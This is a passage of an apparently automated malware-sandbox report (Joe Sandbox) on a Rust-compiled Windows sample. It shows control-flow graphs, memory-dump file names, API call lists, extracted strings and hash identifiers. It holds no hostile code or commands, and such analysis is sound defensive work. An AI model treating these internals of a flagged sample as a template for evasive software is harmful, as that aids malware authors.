                control_flow_graph 1267 2cec40-2cec5a 1268 2ceeed-2ceef4 call 29ad10 1267->1268 1269 2cec60-2cec99 1267->1269 1272 2ceef9-2cef08 call 299690 1268->1272 1271 2cec9f-2cecad 1269->1271 1269->1272 1274 2cecb0-2cecb3 1271->1274 1279 2cef20-2cef2f call 2d28b0 1272->1279 1276 2ced0a-2ced3c 1274->1276 1277 2cecb5-2cecc2 1274->1277 1278 2ced40-2ced4c 1276->1278 1277->1274 1280 2cecc4-2cecca 1277->1280 1281 2ced4e-2ced89 1278->1281 1282 2ced8b-2ced8e 1278->1282 1284 2cecd0-2cecd7 1280->1284 1285 2cedd2-2cee04 call 299650 1280->1285 1281->1278 1281->1282 1288 2cef0a-2cef1b call 29a0a0 1282->1288 1289 2ced94-2ced9c 1282->1289 1286 2cecdd-2cece6 1284->1286 1287 2cee09-2cee13 call 2ce930 1284->1287 1285->1279 1292 2cee6c-2cee7d call 2cef30 1286->1292 1293 2cecec-2ced05 memcpy 1286->1293 1302 2cee18-2cee3d 1287->1302 1288->1279 1294 2ceda0-2ceda6 1289->1294 1298 2cee7f-2cee82 call 2ac2e0 1292->1298 1311 2ceed8-2ceeec 1292->1311 1293->1298 1300 2cedac-2cedbd 1294->1300 1301 2cee44-2cee4b 1294->1301 1313 2cee87-2cee8a 1298->1313 1300->1294 1308 2cedbf-2cedcc 1300->1308 1305 2ceebc 1301->1305 1306 2cee4d-2cee57 1301->1306 1303 2cee8c-2cee9d 1302->1303 1304 2cee3f 1302->1304 1314 2cee9f-2ceeba memcpy 1303->1314 1315 2ceeca-2ceed3 call 2cef30 1303->1315 1304->1311 1310 2ceebf-2ceec8 1305->1310 1306->1310 1312 2cee59-2cee64 call 2ac2e0 1306->1312 1308->1284 1308->1285 1310->1314 1310->1315 1312->1311 1319 2cee66-2cee6a 1312->1319 1313->1303 1313->1311 1314->1311 1315->1311 1319->1310
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
                • Instruction ID: 858a3d13556d15a11bb57f50d5019d26af9afadfe5b18e8dafb0337dc484cb52
                • Opcode Fuzzy Hash: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
                • Instruction Fuzzy Hash: 8C613462731A9082DE20DF2299047AD7760FB19BE4F858B2ADE5E07B84DB3CC1A5C300

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1336 2ac2e0-2ac2fc 1337 2ac45b-2ac45d 1336->1337 1338 2ac302-2ac32a 1336->1338 1339 2ac49d-2ac4ad 1337->1339 1340 2ac34d-2ac366 call 2ab6f0 1338->1340 1342 2ac36b-2ac38c 1340->1342 1343 2ac38e-2ac398 1342->1343 1344 2ac400-2ac403 1342->1344 1343->1344 1345 2ac45f-2ac469 1344->1345 1346 2ac405-2ac408 1344->1346 1345->1339 1347 2ac46b-2ac475 1345->1347 1346->1340 1351 2ac437-2ac43a 1346->1351 1349 2ac4ae-2ac4c5 call 29a0a0 1347->1349 1350 2ac477-2ac47f 1347->1350 1358 2ac4d3-2ac4ff call 298a20 call 2ac500 call 2d28b0 call 29b900 1349->1358 1359 2ac4c7-2ac4ce call 298a20 1349->1359 1350->1339 1352 2ac481-2ac496 memcpy 1350->1352 1351->1337 1354 2ac43c-2ac447 1351->1354 1355 2ac499 1352->1355 1354->1355 1357 2ac449-2ac456 call 29a0a0 1354->1357 1355->1339 1357->1337 1359->1358
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
                • Instruction ID: 4408b0649c0c370db86ff415a4148830880e2090c4f456bd7406509ae6ae590e
                • Opcode Fuzzy Hash: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
                • Instruction Fuzzy Hash: 07317D62330A4483DE29DF26AA1937AA761FB4ABD4F7488129E1E4BB54CF3CC465C344

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1371 2ac40d-2ac427 1372 2ac42d-2ac433 1371->1372 1373 2ac340-2ac347 1371->1373 1376 2ac46b-2ac475 1372->1376 1377 2ac435 1372->1377 1374 2ac34d-2ac366 call 2ab6f0 1373->1374 1375 2ac437-2ac43a 1373->1375 1385 2ac36b-2ac38c 1374->1385 1382 2ac45b-2ac45d 1375->1382 1383 2ac43c-2ac447 1375->1383 1378 2ac4ae-2ac4c5 call 29a0a0 1376->1378 1379 2ac477-2ac47f 1376->1379 1377->1376 1381 2ac49d-2ac4ad 1377->1381 1393 2ac4d3-2ac4ff call 298a20 call 2ac500 call 2d28b0 call 29b900 1378->1393 1394 2ac4c7-2ac4ce call 298a20 1378->1394 1379->1381 1384 2ac481-2ac496 memcpy 1379->1384 1382->1381 1387 2ac499 1383->1387 1388 2ac449-2ac456 call 29a0a0 1383->1388 1384->1387 1389 2ac38e-2ac398 1385->1389 1390 2ac400-2ac403 1385->1390 1387->1381 1388->1382 1389->1390 1395 2ac45f-2ac469 1390->1395 1396 2ac405-2ac408 1390->1396 1394->1393 1395->1376 1395->1381 1396->1373
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
                • Instruction ID: 0873045b459f44b1f802b6578abc7cab20c9e1106ca8d6c9361e36ddaf6a8a2e
                • Opcode Fuzzy Hash: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
                • Instruction Fuzzy Hash: 0E110C6332175443CD258B2ABA1933AAA55AB16BF8F1449218F6E07FD5CF7CC5958204

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1407 2cdbb0-2cdbda call 2cc3a0 1410 2cdbdc-2cdc0e call 2cc650 1407->1410 1411 2cdc10 1407->1411 1410->1411 1415 2cdc1c-2cdc21 call 2d24a4 1410->1415 1413 2cdc13-2cdc1b 1411->1413 1417 2cdc26-2cdc28 1415->1417 1418 2cdc2a-2cdc2d 1417->1418 1419 2cdc40-2cdc50 GetLastError 1417->1419 1420 2cdc2f-2cdc3e call 298a20 1418->1420 1421 2cdc64-2cdc66 1418->1421 1419->1413 1422 2cdc52-2cdc62 call 298a20 1419->1422 1420->1413 1421->1413 1422->1411
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: 736218cf31fc61fe350372b287f9dcccf93c11a5578c81c3f0a6b2c487d84f8a
                • Instruction ID: 9f7eec3a593a5ebc69a6bf844b0238977ec5cce8bf906b671ed5256deddc583b
                • Opcode Fuzzy Hash: 736218cf31fc61fe350372b287f9dcccf93c11a5578c81c3f0a6b2c487d84f8a
                • Instruction Fuzzy Hash: 2211E922B30A6188EF10DA72CD017AD23706794BC8F28453BDE1D57F49DE64C562C300

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1427 293444-293463 1428 293488-293491 call 2d2145 1427->1428 1429 293465-293487 memcpy 1427->1429 1431 293496-29349a 1428->1431 1431->1429
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: d59b927fb2d67b440293602fe0be4ab1e3a279f54766e1be61f706ee28430068
                • Instruction ID: 0fc9ecd81bc5794fc1af6e56494ae064d800b421aa98cebac39ea0d12b119600
                • Opcode Fuzzy Hash: d59b927fb2d67b440293602fe0be4ab1e3a279f54766e1be61f706ee28430068
                • Instruction Fuzzy Hash: D4E02292720694939C08CF2B9E4004C5B25BB1AFD425488229F0C6BF11CF78C9F39300
                APIs
                Strings
                • .debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 002B3A9E
                • .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesUtf8Errorvalid_up_toerror_lenNoneSome, xrefs: 002B1280
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: memcpy
                • String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesUtf8Errorvalid_up_toerror_lenNoneSome$.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs
                • API String ID: 3510742995-2604783721
                • Opcode ID: 6fc48e3d850d740e02283ce2d2516cca550cd13bca25e77061d9554d9f7e8299
                • Instruction ID: c330bf05e5b6aade0cf1120439dc32efe6566f607b7688e4045b9dcc816f9766
                • Opcode Fuzzy Hash: 6fc48e3d850d740e02283ce2d2516cca550cd13bca25e77061d9554d9f7e8299
                • Instruction Fuzzy Hash: BF535632625BC4C8EB71DF29D890BE933A4F75978CF548216CA8D4BB59DF3486A9C340
                APIs
                Strings
                • stack backtrace:, xrefs: 002CF789
                • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 002CFFC6
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ErrorLast$memset$CaptureContextCreateCurrentDirectoryEntryFunctionLookupSnapshotToolhelp32
                • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                • API String ID: 3426570729-3192684347
                • Opcode ID: 5c8e0c5459c1994d2554813a24706ff4f6be2ec6c6413b7801bf94b9463f1c6e
                • Instruction ID: 247107b3e599cc84f41a8e718fab0bb8b2f3762598558ef3df21d1e6f49448b6
                • Opcode Fuzzy Hash: 5c8e0c5459c1994d2554813a24706ff4f6be2ec6c6413b7801bf94b9463f1c6e
                • Instruction Fuzzy Hash: 68729D22221BC089EB70CF25D8447ED3761F74A798F54422ADE4E4BB99DF78C6A5C341
                APIs
                Strings
                • H., xrefs: 002ADA3F
                • assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs, xrefs: 002ADA0C
                • NTDLL.DLL, xrefs: 002AD4FF
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: FormatMessagememcpymemset
                • String ID: H.$NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs
                • API String ID: 2872659494-56576336
                • Opcode ID: 12bc28631c0c6eeaf82aea8d74ce974a5b8dd624ab7898788b5f17c1153bc69d
                • Instruction ID: 07f944f5bb4c68f601fd1f53cbcc82befa7536eed6f21b985c8d3266557c59a8
                • Opcode Fuzzy Hash: 12bc28631c0c6eeaf82aea8d74ce974a5b8dd624ab7898788b5f17c1153bc69d
                • Instruction Fuzzy Hash: 60D10436225AC28AEB318F24D9047FE3B61F706788F444136DA5A0BF99DF78C666D340
                APIs
                • RtlCaptureContext.KERNEL32 ref: 002D2E24
                • RtlLookupFunctionEntry.KERNEL32 ref: 002D2E3B
                • RtlVirtualUnwind.KERNEL32 ref: 002D2E7D
                • SetUnhandledExceptionFilter.KERNEL32 ref: 002D2EC1
                • UnhandledExceptionFilter.KERNEL32 ref: 002D2ECE
                • GetCurrentProcess.KERNEL32 ref: 002D2ED4
                • TerminateProcess.KERNEL32 ref: 002D2EE2
                • abort.MSVCRT ref: 002D2EE8
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                • String ID:
                • API String ID: 4278921479-0
                • Opcode ID: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
                • Instruction ID: 591a1f4d417e70b8b4798c984f2d941e8111fbd7892fdf838110b6a899fbfc53
                • Opcode Fuzzy Hash: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
                • Instruction Fuzzy Hash: 5F211375691F85D9EB008B66F88838933B8F749B84F90062ADE8E57724EF38C599C750
                APIs
                • GetSystemTimeAsFileTime.KERNEL32 ref: 002D2D75
                • GetCurrentProcessId.KERNEL32 ref: 002D2D80
                • GetCurrentThreadId.KERNEL32 ref: 002D2D88
                • GetTickCount.KERNEL32 ref: 002D2D90
                • QueryPerformanceCounter.KERNEL32 ref: 002D2D9E
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                • String ID:
                • API String ID: 1445889803-0
                • Opcode ID: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
                • Instruction ID: 60cb6538926edd8d2ce75c5e4e767361a7d9711f56ecdc9a7ce12f72150df421
                • Opcode Fuzzy Hash: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
                • Instruction Fuzzy Hash: 7411A026765B5182FF208B25F80831573A4B759BB1F4806319E9C037A4EA7CD989C300
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 7c28e3635209d5d210ca6808aeb4c7ca7d276faae547e995a7c688cf08b20bab
                • Instruction ID: b3f67c755759941cd8b90578187dd2ba4784ff539323f73f8b03d721eaa62d6a
                • Opcode Fuzzy Hash: 7c28e3635209d5d210ca6808aeb4c7ca7d276faae547e995a7c688cf08b20bab
                • Instruction Fuzzy Hash: B5918862725B909ADB48CF66E8043AD77A4F709B88F48852AEF9D97B45DF34D4B0C301
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID:
                • String ID: ,(><&*@$::_$$called `Result::unwrap()` on an `Err` value
                • API String ID: 0-2516785824
                • Opcode ID: 5a4507723b2e77f80899ef8ac2e34b233ab0ff2a1e48ea12d33f9ae7da03ed31
                • Instruction ID: a7befb30761c59d6da793aa1db12c1b32ec9f1d546308155639128578fb4b952
                • Opcode Fuzzy Hash: 5a4507723b2e77f80899ef8ac2e34b233ab0ff2a1e48ea12d33f9ae7da03ed31
                • Instruction Fuzzy Hash: 0B528322738A9147DF358F26D848BA92B15F747798F888212EE5E4B790DF79C9E1C301
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a9cb502de78a0e52240177fd8bf44e1e531543acfba2fb83a675cef6f6d4074
                • Instruction ID: 07b685f68fcf9af505df946e4578d944f0cb3a5ec84e5a98edc6984bc95d2ecd
                • Opcode Fuzzy Hash: 1a9cb502de78a0e52240177fd8bf44e1e531543acfba2fb83a675cef6f6d4074
                • Instruction Fuzzy Hash: 5D52DE63A14BC882DB118F2996017E96760F728BD8F46A705DFAD13796EB74E2E5C300
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cfed1fcf7b4532b17ba4c598ecdd85c06c524e453bb52f162a4bd2daa62cb02f
                • Instruction ID: 9c1f261863fe1b821f3f1f2dc1bafede60900fc89010e0599998e8ae23514cdf
                • Opcode Fuzzy Hash: cfed1fcf7b4532b17ba4c598ecdd85c06c524e453bb52f162a4bd2daa62cb02f
                • Instruction Fuzzy Hash: 5D42E0A2B10BD882EB11CF299501BE93721F758BE8B458716DFBE57781EB38D5A4C301
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4e2e57f52f6627f971bda1c10c89978976ffedcc9c7342a29fcc8bf3eb46a65
                • Instruction ID: 209183f027d56b337340aec5c675804cf1dc4902bd8a2ce9860227a11f8cbd76
                • Opcode Fuzzy Hash: b4e2e57f52f6627f971bda1c10c89978976ffedcc9c7342a29fcc8bf3eb46a65
                • Instruction Fuzzy Hash: CA52BC62A14FD882EB118F29D5017E86760F7687D8F46A305EFAE13756EB74E2E5C300
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
